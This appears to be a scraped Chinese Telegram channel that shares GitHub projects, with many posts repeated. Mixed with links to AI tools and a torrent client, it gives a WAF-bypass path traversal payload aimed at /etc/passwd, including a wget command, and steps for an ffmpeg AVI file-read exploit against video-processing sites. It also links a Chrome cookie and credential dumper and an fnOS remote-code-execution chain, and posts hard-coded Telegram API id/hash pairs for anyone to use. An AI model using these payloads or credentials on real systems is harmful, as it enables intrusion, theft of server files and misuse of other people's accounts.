Cloudflare 错误页面生成器,能够创建模仿 Cloudflare 错误页面的自定义错误页面,并且可以将其嵌入到自己的网站中。
https://github.com/donlon/cloudflare-error-page
https://github.com/donlon/cloudflare-error-page
waf 穿透提示:
如果你知道存在的文件夹(例如通过查看网页源代码找到的资源路径),可以将其作为起点:
如果图片路径是 /static/img/logo.png,Payload 可能是:
https://替换/static/img//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
很多简易的防火墙(WAF)或代码会检查输入中是否包含 ../。如果攻击者写成 ....//,一些写得不好的过滤器可能会检测 ../ ,没发现(因为中间多了点)。waf 执行清理逻辑:把所有的 // 替换成 /,目的是为了规范化 URL,waf 执行递归清理,也就是把 .. 删掉,结果剩下的部分又组合成了新的 ../
或者是路径规范化漏洞,有些后端程序在接收到 ....// 时,会先进行一次非标准的字符串处理,将其误判为两个连续的跳转请求,或者将其修剪成了操作系统最终能识别的 ../
wget https://替换/....//....//....//....//....//....//....///....//....//....//....//....//....//....//etc/passwd -k如果你知道存在的文件夹(例如通过查看网页源代码找到的资源路径),可以将其作为起点:
如果图片路径是 /static/img/logo.png,Payload 可能是:
https://替换/static/img//....//....//....//....//....//....//....//....//....//....//....//etc/passwd
很多简易的防火墙(WAF)或代码会检查输入中是否包含 ../。如果攻击者写成 ....//,一些写得不好的过滤器可能会检测 ../ ,没发现(因为中间多了点)。waf 执行清理逻辑:把所有的 // 替换成 /,目的是为了规范化 URL,waf 执行递归清理,也就是把 .. 删掉,结果剩下的部分又组合成了新的 ../
或者是路径规范化漏洞,有些后端程序在接收到 ....// 时,会先进行一次非标准的字符串处理,将其误判为两个连续的跳转请求,或者将其修剪成了操作系统最终能识别的 ../
Forwarded from Eternal_安全内参
https://github.com/LandGrey/SpringBootVulExploit
SpringBoot攻防全解
SpringBoot攻防全解
GitHub
GitHub - LandGrey/SpringBootVulExploit: SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list
SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list. Contribute to LandGrey/SpringBootVulExploit development by creating an account on GitHub.
https://github.com/Maldev-Academy/DumpChromeSecrets
从现代 Chrome 版本中提取数据,包括刷新令牌、cookie、保存的凭据、自动填充数据、浏览历史记录和书签。
从现代 Chrome 版本中提取数据,包括刷新令牌、cookie、保存的凭据、自动填充数据、浏览历史记录和书签。
GitHub
GitHub - Maldev-Academy/DumpChromeSecrets: Extract data from modern Chrome versions, including refresh tokens, cookies, saved credentials…
Extract data from modern Chrome versions, including refresh tokens, cookies, saved credentials, autofill data, browsing history, and bookmarks - Maldev-Academy/DumpChromeSecrets
* Security: api\_id/api\_hash are hard-coded (api_id = 20227969, api_hash = 3fc5e726fcc1160a81704958b2243109); mitigate with rate limits/rotation if abused.
API_ID=25496841
API_HASH=d7ed3ebb8f4323c37c5ffcac40e677d4
BOT_TOKEN=
TG_API_ID="20559113" \
TG_API_HASH="ed8e97b3a73a324f5cf0b6dae63239b2"
供开发者们使用的 Telegram api id 和 hash,不能申请 api 的用户可以尝试下
Forwarded from bupt.moe
bupt.moe
#security 大开眼界,还有这些玩法的? https://zhuanlan.zhihu.com/p/1926774979476825233
利用方法
https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
./gen_xbin_avi.py file://<filename> file_read.avi
Upload file_read.avi to some website that processes videofiles
(on server side, done by the videoservice) ffmpeg -i file_read.avi output.mp4
Click "Play" in the videoservice.
If you are lucky, you'll the content of <filename> from the server.
这个脚本有点老如果要用可能还需要放一个 ffmpeg2.x 的受影响 elf
https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
./gen_xbin_avi.py file://<filename> file_read.avi
Upload file_read.avi to some website that processes videofiles
(on server side, done by the videoservice) ffmpeg -i file_read.avi output.mp4
Click "Play" in the videoservice.
If you are lucky, you'll the content of <filename> from the server.
这个脚本有点老如果要用可能还需要放一个 ffmpeg2.x 的受影响 elf
GitHub
ffmpeg-avi-m3u-xbin/gen_xbin_avi.py at master · neex/ffmpeg-avi-m3u-xbin
Contribute to neex/ffmpeg-avi-m3u-xbin development by creating an account on GitHub.
❤1
https://github.com/666ghj/MiroFish
MiroFish 是一款基于多智能体技术的新一代 AI 预测引擎。通过提取现实世界的种子信息(如突发新闻、政策草案、金融信号),自动构建出高保真的平行数字世界。在此空间内,成千上万个具备独立人格、长期记忆与行为逻辑的智能体进行自由交互与社会演化。你可透过「上帝视角」动态注入变量,精准推演未来走向
你只需:上传种子材料(数据分析报告或者有趣的小说故事),并用自然语言描述预测需求
MiroFish 将返回:一份详尽的预测报告,以及一个可深度交互的高保真数字世界
MiroFish 是一款基于多智能体技术的新一代 AI 预测引擎。通过提取现实世界的种子信息(如突发新闻、政策草案、金融信号),自动构建出高保真的平行数字世界。在此空间内,成千上万个具备独立人格、长期记忆与行为逻辑的智能体进行自由交互与社会演化。你可透过「上帝视角」动态注入变量,精准推演未来走向
你只需:上传种子材料(数据分析报告或者有趣的小说故事),并用自然语言描述预测需求
MiroFish 将返回:一份详尽的预测报告,以及一个可深度交互的高保真数字世界
GitHub
GitHub - 666ghj/MiroFish: A Simple and Universal Swarm Intelligence Engine, Predicting Anything. 简洁通用的群体智能引擎,预测万物
A Simple and Universal Swarm Intelligence Engine, Predicting Anything. 简洁通用的群体智能引擎,预测万物 - 666ghj/MiroFish
看看你们的 IRC 注册时间👀
/msg NickServ info 你的 nickname ALLNickServ: Registered : Apr 10 13:12:20 2022 +0000 (3y 40w 4d ago)
[09:23] NickServ: Last addr : ~OutlinedA@user/OutlinedArc217
[09:23] NickServ: vHost : user/OutlinedArc217 (assigned on Jul 22 02:09:37 2022 +0000 (3y 25w 6d ago))https://github.com/chatfire-AI/huobao-drama
🎬 火宝短剧 - 基于 AI 的一站式短剧生成平台 《一句话生成完整短剧,从剧本到成片全自动化》
🎬 火宝短剧 - 基于 AI 的一站式短剧生成平台 《一句话生成完整短剧,从剧本到成片全自动化》
GitHub
GitHub - chatfire-AI/huobao-drama: 🎬 火宝短剧 - 基于AI的一站式短剧生成平台 《一句话生成完整短剧,从剧本到成片全自动化》 Huobao Drama - An AI-Powered End-to-End Short…
🎬 火宝短剧 - 基于AI的一站式短剧生成平台 《一句话生成完整短剧,从剧本到成片全自动化》 Huobao Drama - An AI-Powered End-to-End Short Drama Generator "One Sentence to Complete Drama: Fully Automated from Script to Final Video&am...
https://github.com/Jagalite/superseedr
Superseedr 是终端下的 BitTorrent
功能特性
🎨 动画化、高性能 TUI(1–60 FPS)
🧲 操作系统级磁力链接支持
📊 实时网络图表与群集(swarm)分析
🔐 官方 Docker + VPN 配置,支持自动端口转发
🔄 无需重启客户端即可动态重载入站端口
✅ 通过基于模型的测试,实现无与伦比的可靠性与正确性
🛡️ 面向私有 Tracker 的构建版本(不使用 PEX 和 DHT)
⚡ 基于 Rust 的引擎,兼顾性能与安全
💾 持久化状态与崩溃恢复
🧵 对等节点级指标与可用性热力图
Superseedr 是终端下的 BitTorrent
功能特性
🎨 动画化、高性能 TUI(1–60 FPS)
🧲 操作系统级磁力链接支持
📊 实时网络图表与群集(swarm)分析
🔐 官方 Docker + VPN 配置,支持自动端口转发
🔄 无需重启客户端即可动态重载入站端口
✅ 通过基于模型的测试,实现无与伦比的可靠性与正确性
🛡️ 面向私有 Tracker 的构建版本(不使用 PEX 和 DHT)
⚡ 基于 Rust 的引擎,兼顾性能与安全
💾 持久化状态与崩溃恢复
🧵 对等节点级指标与可用性热力图
Forwarded from Puddin在TG上看到了啥
在安装必应壁纸后,连续使用 7 天必应搜索免费领取价值 25 元的 B 站大会员月卡
①先加入 Reward https://rewards.bing.com/welcome?rh=46925AC2&ref=rafsrchae&form=ML2XE3&OCID=ML2XE3&PUBL=RewardsDO&CREA=ML2XE3
②打开活动地址
https://aka.ms/bilrwtrend
打不开就用这个https://rewards.bing.com/?form=BILRW2
①先加入 Reward https://rewards.bing.com/welcome?rh=46925AC2&ref=rafsrchae&form=ML2XE3&OCID=ML2XE3&PUBL=RewardsDO&CREA=ML2XE3
②打开活动地址
https://aka.ms/bilrwtrend
打不开就用这个https://rewards.bing.com/?form=BILRW2
Bing
Your invitation: Earn gift cards and more
Microsoft Rewards makes it easy to get rewarded for doing what you love. Join now through this link to qualify for bonus points!
PoC:飞牛 OS(fnOS)RCE 链:认证绕过
无需 longtoken,拿到 rsa_private_key.pem 就可以任意伪造签名
https://github.com/bron1e/fnos-rce-chain
转发不带来源是有原因的
无需 longtoken,拿到 rsa_private_key.pem 就可以任意伪造签名
https://github.com/bron1e/fnos-rce-chain
转发不带来源是有原因的
GitHub
GitHub - bron1e/fnos-rce-chain: 飞牛系统(fnOS)远程代码执行链:认证绕过
飞牛系统(fnOS)远程代码执行链:认证绕过. Contribute to bron1e/fnos-rce-chain development by creating an account on GitHub.